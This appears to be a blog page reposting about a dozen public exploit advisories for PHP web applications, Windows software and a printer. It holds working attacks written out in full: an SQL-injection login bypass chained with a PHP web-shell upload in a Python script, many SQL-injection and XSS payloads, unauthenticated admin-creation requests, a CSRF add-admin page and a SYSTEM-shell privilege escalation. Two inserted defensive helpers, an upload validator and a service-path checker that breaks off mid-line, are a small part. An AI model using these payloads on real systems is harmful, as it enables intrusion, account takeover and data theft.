All posts by ISHACK AI BOT
-
Online Course Registration 2.0 - Remote Code Execution
# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: v2.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description: An attacker can bypass the login page and access the student change-password dashboard.

PoC Request (Authentication Bypass):

POST /onlinecourse/index.php HTTP/1.1
Host: target

regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=

There isn't any file extension control in the student panel "My Profile" section. An unauthorized user can upload a php file as a profile image.

First PoC Request (RCE):

POST /onlinecourse/my-profile.php HTTP/1.1
Host: target

-----------------------------16046344889164047791563222514
Content-Disposition: form-data; name="photo"; filename="simple.php"
Content-Type: application/x-php

<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>

Second PoC Request (RCE):

GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
Host: target

The basic python script below will bypass authentication and execute a command on the target server.
import requests
import sys

if (len(sys.argv) != 3) or sys.argv[1] == "-h":
    print "[*] Usage: PoC.py rhost/rpath "
    print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
    exit(0)

rhost = sys.argv[1]
command = sys.argv[2]
url = "http://"+rhost+"/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
    #bypass authentication
    lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
    #check authentication bypass
    check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
    if check.status_code == 200:
        print "[+] Authentication bypass was successful"
    else:
        print "[-] Authentication bypass was unsuccessful"
        sys.exit()
    #upload simple php file
    files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
    fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
    furl = "http://"+rhost+"/my-profile.php"
    session.post(url=furl, files= files, data=fdata)
    #execution
    final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)
    #check execution
    if final.status_code == 200:
        print "[+] Command execution completed successfully."
        print "\tPut on a happy face!\n"
    else:
        print "[-] Command execution was unsuccessful."
        sys.exit()
    print final.text
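As an added defensive example (not code from the advisory or from PHPGurukul), the Python function below shows the server-side checks that would have stopped the profile-photo upload step: exactly one allowlisted extension, matching magic bytes, no PHP open tag inside the image, and a server-chosen filename. The allowlist, the extension set and the sample inputs are assumptions.

```python
import os
import secrets

# Constructed upload policy for a profile-photo endpoint (assumption: only raster
# images are legitimate here). The extension and the file's leading bytes must
# agree, and the client-supplied Content-Type (application/x-php in the PoC) is
# never consulted, because the client controls it.
ALLOWED_SIGNATURES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Extensions a PHP-enabled server may execute. Apache's mod_mime evaluates every
# dot-separated part of a name, so "photo.php.png" is dangerous too; the check
# below therefore allows exactly one extension instead of inspecting only the last.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "inc"}


def validate_profile_photo(filename, data):
    """Return (ok, reason). ok is True only when the name carries a single
    allowlisted extension and the content starts with that type's signature."""
    # Ignore any directory part the client sends ("../../x.png" -> "x.png").
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        # Also rejects dotfiles such as an uploaded .htaccess.
        return False, "empty or hidden filename"
    parts = base.lower().split(".")
    if len(parts) != 2:
        # "simple.php" passes this line (and is caught below); "x",
        # "x.php.png" and "x..png" are rejected here.
        return False, "filename must have exactly one extension"
    ext = parts[1]
    if ext in EXECUTABLE:
        return False, "executable extension rejected"
    if ext not in ALLOWED_SIGNATURES:
        return False, "extension %r not in allowlist" % ext
    if not any(data.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return False, "content does not match %s signature" % ext
    if b"<?php" in data or b"<?=" in data:
        # Polyglot guard: a valid image that also carries PHP open tags is
        # exactly what a misconfigured handler or an include would execute.
        return False, "PHP open tag found inside image data"
    return True, "ok"


def stored_name(ext):
    """Server-chosen on-disk name; the client's filename is never reused."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's upload step.
    php_probe = b'<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>'
    png_stub = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, blob in [("simple.php", php_probe), ("photo.php.png", png_stub),
                       ("photo.png", php_probe), ("photo.png", png_stub)]:
        print(name, validate_profile_photo(name, blob))
```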
-
Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
# Discovery Date: 2019-09-20
# Exploit Author: Hakan TAŞKÖPRÜ
# Vendor Homepage: http://karakuzu.info/
# Affected Version <= 5.7.0

Vulnerability #1: Unauthenticated SQL Injection
==================================================

Type: Error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND 1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))-- DhDH&k_yetki_duz=USER&kullanici_duzenle=

Type: Time-based blind
Title: Oracle AND time-based blind
Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND 6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)-- VuHD&k_yetki_duz=USER&kullanici_duzenle=

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=

Description: The k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and k_sifre_duz parameters are injectable/vulnerable.

Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User Management Panel
=======================================================================================
Description : An attacker can steal an admin's cookie.

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)" autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=

Vulnerability #3: Unauthenticated Creating Admin User
======================================================
Description : An attacker can create an admin or normal account.

Request:

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=

Vulnerability #4: Unauthenticated Deleting User
=============================================
Description : An attacker can delete an admin or normal account.

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

kullanici_sil=k_adi_duz=USERNAME_TO_DELETE

Vulnerability #5: Unauthenticated Editing User
===============================================
Description : An attacker can change a user's password or role (e.g. ROOT).

POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle=

### History
=============
2019-09-20 Issue discovered
2019-11-19 Vendor contacted (No response)
2020-01-03 Issue published
-
Plantronics Hub 3.13.2 - Local Privilege Escalation
# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation
# Date: 2020-01-2
# Exploit Author: Markus Krell - @MarkusKrell
# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf
# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe
# Version: Plantronics Hub for Windows prior to version 3.14
# Tested on: Windows 10 Enterprise
# CVE : N/A

As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory.
The content of MajorUpgrade.config should look like the following one liner:

<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>

Exchange <WINDOWS-USERNAME> with your local (non-administrative) username.
Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) Windows session. You may of course call any other binary you can plant on the machine.

Steps for exploitation (PoC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config
-
Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A

# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.

================================
'username' - SQLi
================================

POST /dfsms/index.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

username=test&password=test&login=

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'category' & 'categorycode' - SQLi
================================

POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=test&categorycode=test&submit=

---
Parameter: category (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

---
Parameter: categorycode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'companyname' - SQLi
================================

---
Parameter: companyname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'productname' & 'productprice' - SQLi
================================

---
Parameter: productname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---

---
Parameter: productprice (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

================================
'fromdate' & 'todate' - SQLi
================================

---
Parameter: todate (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=

Parameter: fromdate (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---

================================
'mobilenumber' & 'emailid' & 'adminname' - SQLi
================================

---
Parameter: emailid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin&username=admin&[email protected]' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
---

---
Parameter: adminname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&[email protected]&mobilenumber=1234567899&update=
---

---
Parameter: mobilenumber (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin&username=admin&[email protected]&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
---
-
Complaint Management System 4.0 - 'cid' SQL injection
# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.0
# Tested on: Windows 7
# CVE : N/A

Description:
The Complaint Management System v4.0 application from PHPgurukul is vulnerable to blind SQL injection via the 'cid' parameter which is found on the complaint-details.php page.

==========
1. SQLi
==========

SQLMAP POC:

GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
---

The ?cid parameter is vulnerable to SQL injection within the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2

request:

GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
Upgrade-Insecure-Requests: 1
-
NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install NetShareWatcher
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. NetShareWatcher Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install SpotFTP
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. SpotFTP Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
# Date: 2020-01-02
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ibm.com/il-en
# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# CVE: N/A

# Description :
# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)

HTTP Request :

POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
Host: 134.84.35.70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
Origin: https://134.84.35.70
Connection: close
Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
Upgrade-Insecure-Requests: 1

0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=

HTTP Response :

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 269
-
Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-01-05
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://intelliants.com/
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
# Software : Subrion CMS
# Product Version: v 4.0.5.10
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
# With this vulnerability, authorized users can be added to the system.

HTML CSRF PoC :

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
        xhr.withCredentials = true;
        var body = "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"__st\"\r\n" +
          "\r\n" +
          "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"username\"\r\n" +
          "\r\n" +
          "ismailtasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
          "\r\n" +
          "Ismail Tasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"email\"\r\n" +
          "\r\n" +
          "[email protected]\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"website\"\r\n" +
          "\r\n" +
          "https://ismailtasdelen.com\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"phone\"\r\n" +
          "\r\n" +
          "0000000000000000000\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"biography\"\r\n" +
          "\r\n" +
          "NULL\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"plan_id\"\r\n" +
          "\r\n" +
          "2\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:18:43\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:19\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"status\"\r\n" +
          "\r\n" +
          "active\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"save\"\r\n" +
          "\r\n" +
          "Add\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"goto\"\r\n" +
          "\r\n" +
          "list\r\n" +
          "-----------------------------9973334999367242361642875270--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
-
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install BlueAuditor
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. BlueAuditor Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-01-05
#Vendor Homepage : http://webcompanion.com/
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
#Tested on OS: Windows 10

#Analyze PoC :
==============

C:\Users\ZwX>sc qc WCAssistantService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
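As an added audit helper (not part of ZwX's advisory), the Python below parses `sc qc` output, using a constructed copy of the dump shown above, flags a BINARY_PATH_NAME that is unquoted and contains spaces, and lists the path prefixes whose parent directories must not be writable by standard users. The `sc qc` field layout is assumed from the output above.

```python
import re

# Constructed copy of the `sc qc` output quoted in the advisory (French-locale
# Windows, hence "réussite(s)"); used here as the sample input.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\Lavasoft\\Web Companion\\Application\\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of its KEY : value fields."""
    cfg = {}
    m = re.search(r"^SERVICE_NAME:[ \t]*(\S+)", text, re.M)
    if m:
        cfg["SERVICE_NAME"] = m.group(1)
    # Indented "KEY : value" lines; [ \t] rather than \s so a blank value
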